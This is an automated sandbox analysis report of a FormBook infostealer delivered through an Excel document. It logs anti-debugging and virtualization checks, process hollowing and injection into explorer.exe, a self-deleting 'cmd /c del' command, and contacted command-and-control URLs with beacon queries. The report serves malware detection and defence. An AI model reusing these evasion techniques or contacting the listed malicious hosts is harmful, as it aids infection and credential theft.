Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Doc7656.xlsx

Stream path 'EncryptedPackage' entropy: 7.99992025277 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 10_2_00409A80 rdtsc

10_2_00409A80

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2512	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2428	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 856	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: explorer.exe, 0000000D.00000000.2206793838.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.2382828847.0000000005709000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\Public\vbc.exe

Code function: 4_2_001E1574 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,001E2D77,00000000,00000000

4_2_001E1574

Hides threads from debuggers

Show sources

Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 10_2_00409A80 rdtsc

10_2_00409A80

Source: C:\Users\Public\vbc.exe

Code function: 10_2_0040ACC0 LdrLoadDll,

10_2_0040ACC0

Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA26F8 mov eax, dword ptr fs:[00000030h]	10_2_00AA26F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026F00EA mov eax, dword ptr fs:[00000030h]	14_2_026F00EA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026F0080 mov ecx, dword ptr fs:[00000030h]	14_2_026F0080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027126F8 mov eax, dword ptr fs:[00000030h]	14_2_027126F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe

Network Connect: 23.227.38.74 80

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: BC0000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: vbc.exe, 00000004.00000002.2376566970.0000000000970000.00000002.00000001.sdmp, explorer.exe, 0000000D.00000000.2207078967.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2376566970.0000000000970000.00000002.00000001.sdmp, explorer.exe, 0000000D.00000000.2207078967.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.2206793838.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: vbc.exe, 00000004.00000002.2376566970.0000000000970000.00000002.00000001.sdmp, explorer.exe, 0000000D.00000000.2207078967.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\Public\vbc.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Query Registry1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading111	LSASS Memory	Security Software Discovery321	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion12	Security Account Manager	Virtualization/Sandbox Evasion12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools111	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information31	DCSync	System Information Discovery113	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Doc7656.xlsx	24%	ReversingLabs	Document-Office.Exploit.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.vbc.exe.1c0000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.2.colorcpl.exe.bc0000.4.unpack	100%	Avira	TR/Dropper.Gen	Download File
10.2.vbc.exe.6d1db0.3.unpack	100%	Avira	TR/Dropper.Gen	Download File
10.2.vbc.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://uk.tigerwit.com/about/liverpool	0%	Avira URL Cloud	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://ocsp.rootg2.amazontrust.com08	0%	URL Reputation	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
https://tribus-watches.com/	0%	Avira URL Cloud	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://www.ofetons.com/z65/?khm06=LNri0hTDA3J+egDGUUWsiV5v8a8SlWFxc+6+F6yDAxnyfd9Lz/4xhtJBrlTkPubTKsq9BA==&AX=mTXhwhcHBBUhiJp	0%	Avira URL Cloud	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
https://www.tiktok.com/	0%	Avira URL Cloud	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://o.ss2.us/0	0%	URL Reputation	safe
http://www.manutd.comP	0%	Avira URL Cloud	safe
www.mathlene.com/z65/	0%	Avira URL Cloud	safe
http://0k10dk21kkeok2e.online	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crt.rootg2.amazontrust.com/rootg2.cer0=	0%	URL Reputation	safe
http://crt.rootg2.amazontrust.com/rootg2.cer0=	0%	URL Reputation	safe
http://crt.rootg2.amazontrust.com/rootg2.cer0=	0%	URL Reputation	safe
http://www.mancity.comP	0%	Avira URL Cloud	safe
https://sdk.privacy-center.org/loader.js	0%	Avira URL Cloud	safe
http://0k10dk21kkeok2e.online/base/80715A1271D5E2B9CFA3628555538742.htmlKJHpWJXMGDGMCFiCJFToiVmpLqxO	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
0k10dk21kkeok2e.online	104.21.59.148	true	false	unknown
chelseafc.map.fastly.net	151.101.2.133	true	false	unknown
shops.myshopify.com	23.227.38.74	true	true	unknown
d2hhwit6pbhmvu.cloudfront.net	99.86.159.34	true	false	high
carnesymas-restaurante.renova-sa.net	97.107.138.110	true	false	unknown
www.realmadrid.com	unknown	unknown	false	high
www.manutd.com	unknown	unknown	false	high
www.liverpoolfc.com	unknown	unknown	false	high
www.ofetons.com	unknown	unknown	true	unknown
www.mancity.com	unknown	unknown	false	high
www.chelseafc.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ofetons.com/z65/?khm06=LNri0hTDA3J+egDGUUWsiV5v8a8SlWFxc+6+F6yDAxnyfd9Lz/4xhtJBrlTkPubTKsq9BA==&AX=mTXhwhcHBBUhiJp	true	Avira URL Cloud: safe	unknown
www.mathlene.com/z65/	true	Avira URL Cloud: safe	low
http://www.liverpoolfc.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.js	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.mancity.com/base/	vbc.exe	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73386_partnerlogo_p	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/7abcb0d130016504c4a4761ae	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.manutd.com/	vbc.exe	false		high
https://www.mitel.com/learn/case-studies/liverpool-football-club	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.realmadrid.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html	vbc.exe, 00000004.00000002.2376740870.0000000002121000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/11/thumb_110194_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://uk.tigerwit.com/about/liverpool	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.liverpoolfc.com/history/heysel	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/a645dcf8e1f1cf28fb38a0701	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.acronis.com/en-gb/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://treyresearch.net	explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://faq.liverpoolfc.com/portal/home	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108623_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.realmadrid.com	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107697_partnerlogo_	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://ocsp.rootg2.amazontrust.com08	vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.levi.com/GB/en_GB/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.chelseafc.com/-http://www.manutd.com/9http://www.mancity.com/base/	vbc.exe, 00000004.00000000.2162389108.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2201944869.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2202502603.0000000000152000.00000020.00020000.sdmp, vbc.exe, 0000000A.00000000.2202973953.0000000000152000.00000020.00020000.sdmp	false		high
http://www.liverpoolfc.com	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91232_partnerlogo_p	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.youtube.com/realmadrid	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://crl.sca1b.amazontrust.com/sca1b.crl0	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.realmadrid.com	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/16/thumb_15152_partnerlogo_p	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://www.standardchartered.com/home/en/index.html?camp_id=liverpool_source=liverpoolfctv_medium=4	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2376740870.0000000002121000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/41/thumb_40979_partnerlogo_p	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://www.snapchat.com/	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	vbc.exe, 00000004.00000002.2383458544.0000000005F70000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18ac	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_p	vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	false		high
